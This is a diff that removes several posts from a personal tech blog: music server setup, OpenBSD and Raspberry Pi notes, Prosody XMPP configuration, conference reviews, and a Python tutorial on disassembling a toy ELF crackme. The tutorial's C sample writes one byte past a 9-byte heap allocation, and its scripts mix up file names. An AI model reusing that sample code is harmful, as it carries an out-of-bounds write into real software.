~/music -... - -104 directories, 1108 files - - Nice! gonic then happily scanned all my music. - -actually streaming this music - - On my laptop, I decided to just use the NFS share approach -- primarily - because I'd like to stick to cmus and desktop Subsonic clients like - [6]Sublime Music are very clunky. - - On Android, there are quite a few options on F-Droid -- I decided to go - with [7]Ultrasonic since it's the only one that supports Last.fm - scrobbling. - - All things considered, I think I'm pretty satisfied with this. `twas a - good weekend. - -References - - 1. https://github.com/sentriz/gonic - 2. https://www.navidrome.org/ - 3. https://airsonic.github.io/ - 4. https://github.com/sentriz/gonic/issues/89 - 5. https://beets.io/ - 6. https://gitlab.com/sublime-music/sublime-music - 7. https://github.com/ultrasonic/ultrasonic
@@ -1,87 +0,0 @@
- 13 May, 2019 - -My setup - -My daily drivers---hardware, software and workflow - -Hardware - - The only computer I have with me is my [1]HP Envy 13 (2018) (my model - looks a little different). It's a 13" ultrabook, with an i5 8250u, 8 - gigs of RAM and a 256 GB NVMe SSD. It's a very comfy machine that does - everything I need it to. - - For my phone, I use a [2]OnePlus 6T, running stock [3]OxygenOS. As of - this writing, its bootloader hasn't been unlocked and nor has the - device been rooted. I'm also a proud owner of a [4]Nexus 5, which I - really wish Google rebooted. It's surprisingly still usable and runs - Android Pie, although the SIM slot is ruined and the battery backup is - abysmal. - - My watch is a [5]Samsung Gear S3 Frontier. Tizen is definitely better - than Android Wear. - - My keyboard, although not with me in college, is a very old [6]Dell - SK-8110. For the little bit of gaming that I do, I use a [7]HP m150 - gaming mouse. It's the perfect size (and color). - - For my music, I use the [8]Bose SoundLink II. Great pair of headphones, - although the ear cups need replacing. - -And the software - - [DEL: My distro of choice for the past ~1 year has been [9]elementary - OS. I used to be an Arch Linux elitist, complete with an esoteric - window manager, all riced. I now use whatever JustWorks(TM). :DEL] - - Update: As of June 2019, I've switched over to a vanilla Debian 9 - Stretch install, running [10]i3 as my window manager. If you want, you - can dig through my configs at my [11]dotfiles repo. - - Here's a (riced) screenshot of my desktop. - - scrot - - Most of my work is done in either the browser, or the terminal. My - shell is pure [12]zsh, as in no plugin frameworks. It's customized - using built-in zsh functions. Yes, you don't actually need a framework. - It's useless bloat. The prompt itself is generated using a framework I - built in [13]Nim -- [14]nicy. My primary text editor is [15]nvim. - Again, all configs in my dotfiles repo linked above. I manage all my - passwords using [16]pass(1), and I use [17]rofi-pass to access them via - rofi. - - Most of my security tooling is typically run via a Kali Linux docker - container. This is convenient for many reasons, keeps your global - namespace clean and a single command to drop into a Kali shell. - - I use a DigitalOcean droplet (BLR1) as a public filehost, found at - [18]x.icyphox.sh. The UI is the wonderful [19]serve, by [20]ZEIT. The - same box also serves as my IRC bouncer and OpenVPN (TCP), which I - tunnel via SSH running on 443. Campus firewall woes. - - I plan on converting my desktop back at home into a homeserver setup. - Soon(TM). - -References - - 1. https://store.hp.com/us/en/mdp/laptops/envy-13 - 2. https://www.oneplus.in/6t - 3. https://www.oneplus.in/oxygenos - 4. https://en.wikipedia.org/wiki/Nexus_5 - 5. https://www.samsung.com/in/wearables/gear-s3-frontier-r760/ - 6. https://www.amazon.com/Dell-Keyboard-Model-SK-8110-Interface/dp/B00366HMMO - 7. https://www.hpshopping.in/hp-m150-gaming-mouse-3dr63pa.html - 8. https://www.boseindia.com/en_in/products/headphones/over_ear_headphones/soundlink-around-ear-wireless-headphones-ii.html - 9. https://elementary.io/ - 10. https://i3wm.org/ - 11. https://github.com/icyphox/dotfiles - 12. http://www.zsh.org/ - 13. https://nim-lang.org/ - 14. https://github.com/icyphox/nicy - 15. https://neovim.org/ - 16. https://passwordstore.org/ - 17. https://github.com/carnager/rofi-pass - 18. https://x.icyphox.sh/ - 19. https://github.com/zeit/serve - 20. https://zeit.co/
@@ -1,101 +0,0 @@
- 09 March, 2020 - -Nullcon 2020 - -An opinion-filled review of Nullcon Goa, 2020 - - Disclaimer: Political. - - This year's conference was at the Taj Hotel and Convention center, Dona - Paula, and its associated party at Cidade de Goa, also by Taj. Great - choice of venue, perhaps even better than last time. The food was fine, - the views were better. - - With those things out of the way -- let's talk talks. I think I - preferred the panels to the talks -- I enjoy a good, stimulating - discussion as opposed to only half-understanding a deeply technical - talk -- but that's just me. But there was this one talk that I really - enjoyed, perhaps due to its unintended comedic value; I'll get into - that later. - - The list of panels/talks I attended in order: - - Day 1 - * Keynote: The Metadata Trap by Micah Lee (Talk) - * Securing the Human Factor (Panel) - * Predicting Danger: Building the Ideal Threat Intelligence Model - (Panel) - * Lessons from the Cyber Trenches (Panel) - * Mlw 41#: a new sophisticated loader by APT group TA505 by Alexey - Vishnyakov (Talk) - * Taking the guess out of Glitching by Adam Laurie (Talk) - * Keynote: Cybersecurity in India -- Information Assymetry, Cross - Border Threats and National Sovereignty by Saumil Shah (Talk) - - Day 2 - * Keynote: Crouching hacker, killer robot? Removing fear from - cyber-physical security by Stefano Zanero (Talk) - * Supply Chain Security in Critical Infrastructure Systems (Panel) - * Putting it all together: building an iOS jailbreak from scratch by - Umang Raghuvanshi (Talk) - * Hack the Law: Protection for Ethical Cyber Security Research in - India (Panel) - -Re: Closing keynote - - I wish I could link the talk, but it hasn't been uploaded just yet. - I'll do it once it has. So, I've a few comments I'd like to make on - some of Saumil's statements. - - He proposed that the security industry trust the user more, and let - them make the decisions pertaining to personal security / privacy. - Except...that's just not going to happen. If all users were capable of - making good, security-first choices -- we as an industry don't need to - exist. But that is unfortunately not the case. Users are dumb. They - value convenience and immediacy over security. That's the sad truth of - the modern age. - - Another thing he proposed was that the Indian Government build our own - "Military Grade" and "Consumer Grade" encryption. - - ...what? - - A "security professional" suggesting that we roll our own crypto? What - even. Oh and, to top it off -- when [1]Raman, very rightly countered - saying that the biggest opponent to encryption is the Government, and - trusting them to build safe cryptosystems is probably not wise, he - responded by saying something to the effect of "Eh, who cares? If they - want to backdoor it, let them." - - Bruh moment. - - He also had some interesting things to say about countering - disinformation. He said, and I quote "Join the STFU University". - - wat? Is that your best solution? - - Judging by his profile, and certain other things he said in the talk, - it is safe to conclude that his ideals are fairly...nationalistic. I'm - not one to police political opinions, I couldn't care less which way - you lean, but the statements made in the talk were straight up - incorrect. - -Closing thoughts - - This came out more rant-like than I'd intended. It is also the first - blog post where I dip my toes into politics. I've some thoughts on more - controversial topics for my next entry. That'll be fun, especially when - my follower count starts dropping. LULW. - - Saumil, if you ever end up reading this, note that this is not a - personal attack. I think you're a cool guy. - - Note to the Nullcon organizers: you guys did a fantastic job running - the conference despite Corona-chan's best efforts. I'd like to suggest - one little thing though -- please VET YOUR SPEAKERS more! - - group pic - -References - - 1. https://twitter.com/tame_wildcard
@@ -1,143 +0,0 @@
- 17 April, 2020 - -OpenBSD on the HP Envy 13 - -I put a blowfish in my laptop this week - - My existing KISS install broke because I thought it would be a great - idea to have [1]apk-tools alongside the kiss package manager. It's safe - to say, that did not end well -- especially when I installed, and then - removed a package. With a semi-broken install that I didn't feel like - fixing, I figured I'd give OpenBSD a try. And I did. - -installation and setup - - Ran into some trouble booting off the USB initially, turned out to be a - faulty stick. Those things aren't built to last, sadly. Flashed a new - stick, booted up. Setup was pleasant, very straightforward. Didn't - really have to intervene much. - - After booting in, I was greeted with a very archaic looking FVWM - desktop. It's not the prettiest thing, and especially annoying to work - with when you don't have your mouse setup, i.e. no tap-to-click. - - I needed wireless, and my laptop doesn't have an Ethernet port. USB - tethering just works, but the connection kept dying. I'm not sure why. - Instead, I downloaded the [2]iwm(4) firmware from [3]here, loaded it up - on a USB stick and copied it over to /etc/firmware. After that, it was - as simple as running [4]fw_update(1) and the firmware is auto-detected - and loaded. In fact, if you have working Internet, fw_update will - download the required firmware for you, too. - - Configuring wireless is painless and I'm so glad to see that there's no - wpa_supplicant horror to deal with. It's as simple as: -$ doas ifconfig iwm0 nwid YOUR_SSID wpakey YOUR_PSK - - Also see [5]hostname.if(5) to make this persist. After that, it's only - a matter of specifying your desired SSID, and ifconfig will - automatically auth and procure an IP lease. -$ doas ifconfig iwm0 nwid YOUR_SSID - - By now I was really starting to get exasperated by FVWM, and decided to - switch to something nicer. I tried building 2bwm (my previous WM), but - that failed. I didn't bother trying to figure this out, so I figured - I'd give [6]cwm(1) a shot. Afterall, people sing high praises of it. - - And boy, is it good. The config is a breeze, and actually pretty - powerful. [7]Here's mine. cwm also has a built-in launcher, so dmenu - isn't necessary anymore. Refer to [8]cwmrc(5) for all the config - options. - - Touchpad was pretty simple to setup too -- OpenBSD has [9]wsconsctl(8), - which lets you set your tap-to-click, mouse acceleration etc. However, - more advanced configuration can be achieved by getting Xorg to use the - Synaptics driver. Just add a 70-synaptics.conf to /etc/X11/xorg.conf.d - (make the dir if it doesn't exist), containing: -Section "InputClass" - Identifier "touchpad catchall" - Driver "synaptics" - MatchIsTouchpad "on" - Option "TapButton1" "1" - Option "TapButton2" "3" - Option "TapButton3" "2" - Option "VertEdgeScroll" "on" - Option "VertTwoFingerScroll" "on" - Option "HorizEdgeScroll" "on" - Option "HorizTwoFingerScroll" "on" - Option "VertScrollDelta" "111" - Option "HorizScrollDelta" "111" -EndSection - - There are a lot more options that can be configured, see - [10]synaptics(4). - - Suspend and hibernate just work, thanks to [11]apm(8). Suspend on - lid-close just needs one sysctl tweak: -$ sysctl machdep.lidaction=1 - - I believe it's set to 1 by default on some installs, but I'm not sure. - -impressions - - I already really like the philosophy of OpenBSD -- security and - simplicity, while not losing out on sanity. The default install is - plentiful, and has just about everything you'd need to get going. I - especially enjoy how everything just works! I was pleasantly surprised - to see my brightness and volume keys work without any configuration! - It's clear that the devs actually dogfood OpenBSD, unlike uh, cough - Free- cough. Gosh I hope it's not the flu. :^) - - Oh and did you notice all the manpage links I've littered throughout - this post? They have manpages for everything; it's ridiculous. And - they're very thorough. Arch Wiki is good, but it's incorrect at times, - or simply outdated. OpenBSD's manpages, although catering only to - OpenBSD have never failed me. - - Performance and battery life are fine. Battery is in fact, identical, - if not better than on Linux. OpenBSD disables HyperThreading/SMT for - security reasons, but you can manually enable it if you wish to do so: -$ sysctl hw.smt=1 - - Package management is probably the only place where OpenBSD falls - short. [12]pkg_add(1) isn't particularly fast, considering it's written - in Perl. The ports selection is fine, I have yet to find something that - I need not on there. I also wish they debloated packages; maybe I've - just been spoilt by KISS. I now have D-Bus on my system thanks to - Firefox. :( - - I appreciate the fact that they don't have a political document -- a - Code of Conduct. CoCs are awful, and have only proven to be harmful for - projects; part of the reason why I'm sick of Linux and its community. - Oh wait, OpenBSD does have one: [13]https://www.openbsd.org/mail.html - ;) - - I'll be exploring [14]vmd(8) to see if I can get a Linux environment - going. Perhaps that'll be my next post, but when have I ever delivered? - - I'll close this post off with my new rice, and a sick ASCII art I made. - \. -- --./ - / ^ ^ ^ \ - (o)(o) ^ ^ |_/| - {} ^ ^ > ^| \| - \^ ^ ^ ^/ - / -- --\ - ~icy - - openbsd rice - -References - - 1. https://github.com/alpinelinux/apk-tools - 2. http://man.openbsd.org/iwm.4 - 3. http://firmware.openbsd.org/firmware/6.6/ - 4. http://man.openbsd.org/fw_update.1 - 5. http://man.openbsd.org/hostname.if.5 - 6. http://man.openbsd.org/cwm.1 - 7. https://github.com/icyphox/dotfiles/blob/master/home/.cwmrc - 8. https://man.openbsd.org/cwmrc.5 - 9. http://man.openbsd.org/wsconsctl.8 - 10. http://man.openbsd.org/synaptics.4 - 11. http://man.openbsd.org/apm.8 - 12. http://man.openbsd.org/pkg_add.1 - 13. https://www.openbsd.org/mail.html - 14. http://man.openbsd.org/vmd.8
@@ -1,87 +0,0 @@
- 04 June, 2020 - -Migrating to the RPi - -Raspberry Pi shenanigans, and other things - - I'd ordered the Raspberry Pi 4B (the 4GB variant), sometime early this - year, thinking I'd get to self-hosting everything on it as soon as it - arrived. As things turn out, it ended up sitting in its box up until - two weeks ago -- it took me that long to order an SD card for it. No, I - didn't have one. Anyway, from there began quite the wild ride. - -flashing the SD card - - You'd think this would be easy right? Just plug it into your laptop's - SD card reader (or microSD), and flash it like you would a USB drive. - Well, nope. Of the three laptops at home one doesn't have an SD card - reader, mine -- running OpenBSD -- didn't detect it, and my brother's - -- running Void -- didn't detect it either. - - Then it hit me: my phone (my brother's, actually), has an SD card slot - that actually works. Perhaps I can use the phone to flash the image? - Took a bit of DDG'ing (ducking?), but we eventually figured out that - the block-device for the SD on the phone was /dev/mmcblk1. Writing to - it was just the usual dd invocation. - -got NAT'd - - After the initial setup, I was eager to move my services off the - Digital Ocean VPS, to the RPi. I set up the SSH port forward through my - router config, as a test. Turns out my ISP has me NAT'd. The entirety - of my apartment is serviced by these fellas, and they have us all under - a CG-NAT. Fantastic. - - Evading this means I either lease a public IP from the ISP, or I - continue using my VPS, and port forward traffic from it via a tunnel. I - went with option two since it gives me something to do. - -NAT evasion - - This was fairly simple to setup with Wireguard and iptables. I don't - really want to get into detail here, since it's been documented aplenty - online, but in essence you put your VPS and the Pi on the same network, - and forward traffic hitting your internet facing interface (eth0) to - the VPN's (wg0). Fairly simple stuff. - -setting up Mastodon on the Pi - - Mastodon was kind of annoying to get working. My initial plan was to - port forward only a few selected ports, have Mastodon exposed on the Pi - at some port via nginx, and then front that nginx via the VPS. So - basically: Mastodon (localhost on Pi) <-> nginx (on Pi) <-> nginx (on - VPS, via Wireguard). I hope that made sense. - - Anyway, this setup would require having Mastodon run on HTTP, since - I'll be HTTPS'ing at the VPS. If you think about it, it's kinda like - what Cloudflare does. But, Mastodon doesn't like running on HTTP. It - just wasn't working. So I went all in and decided to forward all - ^80/[443] traffic and serve everything off the Pi. - - Getting back to Mastodon -- the initial few hiccups aside, I was able - to get it running at toot.icyphox.sh. However, as a seeker of - aesthetics, I wanted my handle to be @icyphox.sh. Turns out, this can - be achieved fairly easily. - - Add a new WEB_DOMAIN variable to your .env.production file, found in - your Mastodon root dir. Set WEB_DOMAIN to your desired domain, and - LOCAL_DOMAIN to the, well, undesired one. In my case: -WEB_DOMAIN=icyphox.sh -LOCAL_DOMAIN=toot.icyphox.sh - - Funnily enough, the [1]official documentation for this says the exact - opposite, which...doesn't work. - - I don't really understand, but whatever it works and now my Mastodon is - @[2]x@icyphox.sh. I'm not complaining. Send mail if you know what's - going on here. - - And oh, here's the protective case [3]nerd fashioned out of cardboard. - - raspberry pi case - -References - - 1. https://github.com/tootsuite/documentation/blob/archive/Running-Mastodon/Serving_a_different_domain.md - 2. https://toot.icyphox.sh/@x - 3. https://peppe.rs/
@@ -1,138 +0,0 @@
- 18 February, 2020 - -Setting up Prosody for XMPP - -I setup Prosody yesterday--here's how I did it - - Remember the [1]IRC for DMs article I wrote a while back? Well...it's - safe to say that IRC didn't hold up too well. It first started with the - bot. Buggy code, crashed a lot -- we eventually gave up and didn't - bring the bot back up. Then came the notifications, or lack thereof. - Revolution IRC has a bug where your custom notification rules just get - ignored after a while. In my case, this meant that notifications for - #crimson stopped entirely. Unless, of course, Nerdy pinged me each - time. - - Again, none of these problems are inherent to IRC itself. IRC is - fantastic, but perhaps wasn't the best fit for our usecase. I still do - use IRC though, just not for 1-on-1 conversations. - -Why XMPP? - - For one, it's better suited for 1-on-1 conversations. It also has - support for end-to-end encryption (via OMEMO), something IRC doesn't - have.^[2]1 Also, it isn't centralized (think: email). - -So...Prosody - - [3]Prosody is an XMPP server. Why did I choose this over ejabberd, - OpenFire, etc.? No reason, really. Their website looked cool, I guess. - -Installing - - Setting it up was pretty painless (I've [4]experienced worse). If - you're on a Debian-derived system, add: -# modify according to your distro -deb https://packages.prosody.im/debian buster main - - to your /etc/apt/sources.list, and: -# apt update -# apt install prosody - -Configuring - - Once installed, you will find the config file at - /etc/prosody/prosody.cfg.lua. Add your XMPP user (we will make this - later), to the admins = {} line. -admins = {"user@chat.example.com"} - - Head to the modules_enabled section, and add this to it: -modules_enabled = { - "posix"; - "omemo_all_access"; -... - -- uncomment these - "groups"; - "mam"; - -- and any others you think you may need -} - - We will install the omemo_all_access module later. - - Set c2s_require_encryption, s2s_require_encryption, and s2s_secure_auth - to true. Set the pidfile to /tmp/prosody.pid (or just leave it as - default?). - - By default, Prosody stores passwords in plain-text, so fix that by - setting authentication to "internal_hashed" - - Head to the VirtualHost section, and add your vhost. Right above it, - set the path to the HTTPS certificate and key: -certificates = "certs" -- relative to your config file location -https_certificate = "certs/chat.example.com.crt" -https_key = "certs/chat.example.com.key" -... - -VirtualHost "chat.example.com" - - I generated these certs using Let's Encrypt's certbot, you can use - whatever. Here's what I did: -# certbot --nginx -d chat.example.com - - This generates certs at /etc/letsencrypt/live/chat.example.com/. You - can trivially import these certs into Prosody's /etc/prosody/certs/ - directory using: -# prosodyctl cert import /etc/letsencrypt/live/chat.example.com - -Plugins - - All the modules for Prosody can be hg clone'd from - [5]https://hg.prosody.im/prosody-modules. You will, obviously, need - Mercurial installed for this. - - Clone it somewhere, and: -# cp -R prosody-modules/mod_omemo_all_access /usr/lib/prosody/modules - - Do the same thing for whatever other module you choose to install. - Don't forget to add it to the modules_enabled section in the config. - -Adding users - - prosodyctl makes this a fairly simple task: -$ prosodyctl adduser user@chat.example.com - - You will be prompted for a password. You can optionally, enable user - registrations from XMPP/Jabber clients (security risk!), by setting - allow_registration = true. - - I may have missed something important, so here's [6]my config for - reference. - -Closing notes - - That's pretty much all you need for 1-on-1 E2EE chats. I don't know - much about group chats just yet -- trying to create a group in - Conversations gives a "No group chat server found". I will figure it - out later. - - Another thing that doesn't work in Conversations is adding an account - using an SRV record.^[7]2 Which kinda sucks, because having a chat. - subdomain isn't very clean, but whatever. - - Oh, also -- you can message me at [8]icy@chat.icyphox.sh. - __________________________________________________________________ - - 1. I'm told IRC supports OTR, but I haven't ever tried. - 2. [9]https://prosody.im/doc/dns - -References - - 1. https://icyphox.sh/blog/irc-for-dms/ - 2. https://icyphox.sh/home/icy/leet/site/build/blog/prosody/temp.html#fn:otr - 3. https://prosody.im/ - 4. https://icyphox.sh/blog/mailserver - 5. https://hg.prosody.im/prosody-modules - 6. https://x.icyphox.sh/prosody.cfg.lua - 7. https://icyphox.sh/home/icy/leet/site/build/blog/prosody/temp.html#fn:srv - 8. xmpp:icy@chat.icyphox.sh - 9. https://prosody.im/doc/dns
@@ -1,84 +0,0 @@
- 15 October, 2019 - -PyCon India 2019 wrap-up - -Pretty fun weekend, I'd say - - I'm writing this article as I sit in class, back on the grind. Last - weekend -- Oct 12th and 13th---was PyCon India 2019, in Chennai, India. - It was my first PyCon, and my first ever talk at a major conference! - This is an account of the all the cool stuff I saw, people I met and - the talks I enjoyed. Forgive the lack of pictures -- I prefer living - the moment through my eyes. - -Talks - - So much ML! Not that it's a bad thing, but definitely interesting to - note. From what I counted, there were about 17 talks tagged under "Data - Science, Machine Learning and AI". I'd have liked to see more talks - discussing security and privacy, but hey, the organizers can only pick - from what's submitted. ;) - - With that point out of the way, here are some of the talks I really - liked: - * Python Packaging - where we are and where we're headed by - [1]Pradyun - * Micropython: Building a Physical Inventory Search Engine by - [2]Vinay - * Ragabot - Music Encoded by [3]Vikrant - * Let's Hunt a Memory Leak by [4]Sanket - * oh and of course, [5]David Beazley's closing keynote - -My talk (!!!) - - My good buddy [6]Raghav and I spoke about our smart lock security - research. Agreed, it might have been less "hardware" and more of a bug - on the server-side, but that's the thing about IoT right? It's so - multi-faceted, and is an amalgamation of so many different hardware and - software stacks. But, anyway... - - I was reassured by folks after the talk that the silence during Q/A was - the "good" kind of silence. Was it really? I'll never know. - -Some nice people I met - - * [7]Abhirath -- A 200 IQ lad. Talked to me about everything from - computational biology to the physical implementation of quantum - computers. - * [8]Abin -- He recognized me from my [9]r/unixporn posts, which was - pretty awesome. - * [10]Abhishek - * Pradyun and Vikrant (linked earlier) - - And a lot of other people doing really great stuff, whose names I'm - forgetting. - -Pictures! - - It's not much, and I can't be bothered to format them like a collage or - whatever, so I'll just dump them here -- as is. - - nice badge awkward smile! me talking s443 @ pycon - -C'est tout - - Overall, a great time and a weekend well spent. It was very different - from your typical security conference -- a lot more chill, if you will. - The organizers did a fantastic job and the entire event was put - together really well. I don't have much else to say, but I know for - sure that I'll be there next time. - - That was PyCon India, 2019. - -References - - 1. https://twitter.com/pradyunsg - 2. https://twitter.com/stonecharioteer - 3. https://twitter.com/vikipedia - 4. https://twitter.com/sankeyplus - 5. https://twitter.com/dabeaz - 6. https://twitter.com/_vologue - 7. https://twitter.com/abhirathb - 8. https://twitter.com/meain_ - 9. https://reddit.com/r/unixporn - 10. https://twitter.com/h6165
@@ -1,313 +0,0 @@
- 08 February, 2019 - -Python for Reverse Engineering - -Building your own disassembly tooling for -- that's right -- fun and profit - - While solving complex reversing challenges, we often use established - tools like radare2 or IDA for disassembling and debugging. But there - are times when you need to dig in a little deeper and understand how - things work under the hood. - - Rolling your own disassembly scripts can be immensely helpful when it - comes to automating certain processes, and eventually build your own - homebrew reversing toolchain of sorts. At least, that's what I'm - attempting anyway. - -Setup - - As the title suggests, you're going to need a Python 3 interpreter - before anything else. Once you've confirmed beyond reasonable doubt - that you do, in fact, have a Python 3 interpreter installed on your - system, run -$ pip install capstone pyelftools - - where capstone is the disassembly engine we'll be scripting with and - pyelftools to help parse ELF files. - - With that out of the way, let's start with an example of a basic - reversing challenge. -/* chall.c */ - -#include <stdio.h> -#include <stdlib.h> -#include <string.h> - -int main() { - char *pw = malloc(9); - pw[0] = 'a'; - for(int i = 1; i <= 8; i++){ - pw[i] = pw[i - 1] + 1; - } - pw[9] = '\0'; - char *in = malloc(10); - printf("password: "); - fgets(in, 10, stdin); // 'abcdefghi' - if(strcmp(in, pw) == 0) { - printf("haha yes!\n"); - } - else { - printf("nah dude\n"); - } -} - - Compile it with GCC/Clang: -$ gcc chall.c -o chall.elf - -Scripting - - For starters, let's look at the different sections present in the - binary. -# sections.py - -from elftools.elf.elffile import ELFFile - -with open('./chall.elf', 'rb') as f: - e = ELFFile(f) - for section in e.iter_sections(): - print(hex(section['sh_addr']), section.name) - - This script iterates through all the sections and also shows us where - it's loaded. This will be pretty useful later. Running it gives us -> python sections.py -0x238 .interp -0x254 .note.ABI-tag -0x274 .note.gnu.build-id -0x298 .gnu.hash -0x2c0 .dynsym -0x3e0 .dynstr -0x484 .gnu.version -0x4a0 .gnu.version_r -0x4c0 .rela.dyn -0x598 .rela.plt -0x610 .init -0x630 .plt -0x690 .plt.got -0x6a0 .text -0x8f4 .fini -0x900 .rodata -0x924 .eh_frame_hdr -0x960 .eh_frame -0x200d98 .init_array -0x200da0 .fini_array -0x200da8 .dynamic -0x200f98 .got -0x201000 .data -0x201010 .bss -0x0 .comment -0x0 .symtab -0x0 .strtab -0x0 .shstrtab - - Most of these aren't relevant to us, but a few sections here are to be - noted. The .text section contains the instructions (opcodes) that we're - after. The .data section should have strings and constants initialized - at compile time. Finally, the .plt which is the Procedure Linkage Table - and the .got, the Global Offset Table. If you're unsure about what - these mean, read up on the ELF format and its internals. - - Since we know that the .text section has the opcodes, let's disassemble - the binary starting at that address. -# disas1.py - -from elftools.elf.elffile import ELFFile -from capstone import * - -with open('./bin.elf', 'rb') as f: - elf = ELFFile(f) - code = elf.get_section_by_name('.text') - ops = code.data() - addr = code['sh_addr'] - md = Cs(CS_ARCH_X86, CS_MODE_64) - for i in md.disasm(ops, addr): - print(f'0x{i.address:x}:\t{i.mnemonic}\t{i.op_str}') - - The code is fairly straightforward (I think). We should be seeing this, - on running -> python disas1.py | less -0x6a0: xor ebp, ebp -0x6a2: mov r9, rdx -0x6a5: pop rsi -0x6a6: mov rdx, rsp -0x6a9: and rsp, 0xfffffffffffffff0 -0x6ad: push rax -0x6ae: push rsp -0x6af: lea r8, [rip + 0x23a] -0x6b6: lea rcx, [rip + 0x1c3] -0x6bd: lea rdi, [rip + 0xe6] -**0x6c4: call qword ptr [rip + 0x200916]** -0x6ca: hlt -... snip ... - - The line in bold is fairly interesting to us. The address at [rip + - 0x200916] is equivalent to [0x6ca + 0x200916], which in turn evaluates - to 0x200fe0. The first call being made to a function at 0x200fe0? What - could this function be? - - For this, we will have to look at relocations. Quoting [1]linuxbase.org - - Relocation is the process of connecting symbolic references with - symbolic definitions. For example, when a program calls a function, - the associated call instruction must transfer control to the proper - destination address at execution. Relocatable files must have - "relocation entries'' which are necessary because they contain - information that describes how to modify their section contents, - thus allowing executable and shared object files to hold the right - information for a process's program image. - - To try and find these relocation entries, we write a third script. -# relocations.py - -import sys -from elftools.elf.elffile import ELFFile -from elftools.elf.relocation import RelocationSection - -with open('./chall.elf', 'rb') as f: - e = ELFFile(f) - for section in e.iter_sections(): - if isinstance(section, RelocationSection): - print(f'{section.name}:') - symbol_table = e.get_section(section['sh_link']) - for relocation in section.iter_relocations(): - symbol = symbol_table.get_symbol(relocation['r_info_sym']) - addr = hex(relocation['r_offset']) - print(f'{symbol.name} {addr}') - - Let's run through this code real quick. We first loop through the - sections, and check if it's of the type RelocationSection. We then - iterate through the relocations from the symbol table for each section. - Finally, running this gives us -> python relocations.py -.rela.dyn: - 0x200d98 - 0x200da0 - 0x201008 -_ITM_deregisterTMCloneTable 0x200fd8 -**__libc_start_main 0x200fe0** -__gmon_start__ 0x200fe8 -_ITM_registerTMCloneTable 0x200ff0 -__cxa_finalize 0x200ff8 -stdin 0x201010 -.rela.plt: -puts 0x200fb0 -printf 0x200fb8 -fgets 0x200fc0 -strcmp 0x200fc8 -malloc 0x200fd0 - - Remember the function call at 0x200fe0 from earlier? Yep, so that was a - call to the well known __libc_start_main. Again, according to - [2]linuxbase.org - - The __libc_start_main() function shall perform any necessary - initialization of the execution environment, call the main function - with appropriate arguments, and handle the return from main(). If - the main() function returns, the return value shall be passed to the - exit() function. - - And its definition is like so -int __libc_start_main(int *(main) (int, char * *, char * *), -int argc, char * * ubp_av, -void (*init) (void), -void (*fini) (void), -void (*rtld_fini) (void), -void (* stack_end)); - - Looking back at our disassembly -0x6a0: xor ebp, ebp -0x6a2: mov r9, rdx -0x6a5: pop rsi -0x6a6: mov rdx, rsp -0x6a9: and rsp, 0xfffffffffffffff0 -0x6ad: push rax -0x6ae: push rsp -0x6af: lea r8, [rip + 0x23a] -0x6b6: lea rcx, [rip + 0x1c3] -**0x6bd: lea rdi, [rip + 0xe6]** -0x6c4: call qword ptr [rip + 0x200916] -0x6ca: hlt -... snip ... - - but this time, at the lea or Load Effective Address instruction, which - loads some address [rip + 0xe6] into the rdi register. [rip + 0xe6] - evaluates to 0x7aa which happens to be the address of our main() - function! How do I know that? Because __libc_start_main(), after doing - whatever it does, eventually jumps to the function at rdi, which is - generally the main() function. It looks something like this - - To see the disassembly of main, seek to 0x7aa in the output of the - script we'd written earlier (disas1.py). - - From what we discovered earlier, each call instruction points to some - function which we can see from the relocation entries. So following - each call into their relocations gives us this -printf 0x650 -fgets 0x660 -strcmp 0x670 -malloc 0x680 - - Putting all this together, things start falling into place. Let me - highlight the key sections of the disassembly here. It's pretty - self-explanatory. -0x7b2: mov edi, 0xa ; 10 -0x7b7: call 0x680 ; malloc - - The loop to populate the *pw string -0x7d0: mov eax, dword ptr [rbp - 0x14] -0x7d3: cdqe -0x7d5: lea rdx, [rax - 1] -0x7d9: mov rax, qword ptr [rbp - 0x10] -0x7dd: add rax, rdx -0x7e0: movzx eax, byte ptr [rax] -0x7e3: lea ecx, [rax + 1] -0x7e6: mov eax, dword ptr [rbp - 0x14] -0x7e9: movsxd rdx, eax -0x7ec: mov rax, qword ptr [rbp - 0x10] -0x7f0: add rax, rdx -0x7f3: mov edx, ecx -0x7f5: mov byte ptr [rax], dl -0x7f7: add dword ptr [rbp - 0x14], 1 -0x7fb: cmp dword ptr [rbp - 0x14], 8 -0x7ff: jle 0x7d0 - - And this looks like our strcmp() -0x843: mov rdx, qword ptr [rbp - 0x10] ; *in -0x847: mov rax, qword ptr [rbp - 8] ; *pw -0x84b: mov rsi, rdx -0x84e: mov rdi, rax -0x851: call 0x670 ; strcmp -0x856: test eax, eax ; is = 0? -0x858: jne 0x868 ; no? jump to 0x868 -0x85a: lea rdi, [rip + 0xae] ; "haha yes!" -0x861: call 0x640 ; puts -0x866: jmp 0x874 -0x868: lea rdi, [rip + 0xaa] ; "nah dude" -0x86f: call 0x640 ; puts - - I'm not sure why it uses puts here? I might be missing something; - perhaps printf calls puts. I could be wrong. I also confirmed with - radare2 that those locations are actually the strings "haha yes!" and - "nah dude". - - Update: It's because of compiler optimization. A printf() (in this - case) is seen as a bit overkill, and hence gets simplified to a puts(). - -Conclusion - - Wew, that took quite some time. But we're done. If you're a beginner, - you might find this extremely confusing, or probably didn't even - understand what was going on. And that's okay. Building an intuition - for reading and grokking disassembly comes with practice. I'm no good - at it either. - - All the code used in this post is here: - [3]https://github.com/icyphox/asdf/tree/master/reversing-elf - - Ciao for now, and I'll see ya in #2 of this series -- PE binaries. - Whenever that is. - -References - - 1. http://refspecs.linuxbase.org/elf/gabi4+/ch4.reloc.html - 2. http://refspecs.linuxbase.org/LSB_3.1.0/LSB-generic/LSB-generic/baselib%20--%20libc-start-main-.html - 3. https://github.com/icyphox/asdf/tree/master/reversing-elf
@@ -1,202 +0,0 @@
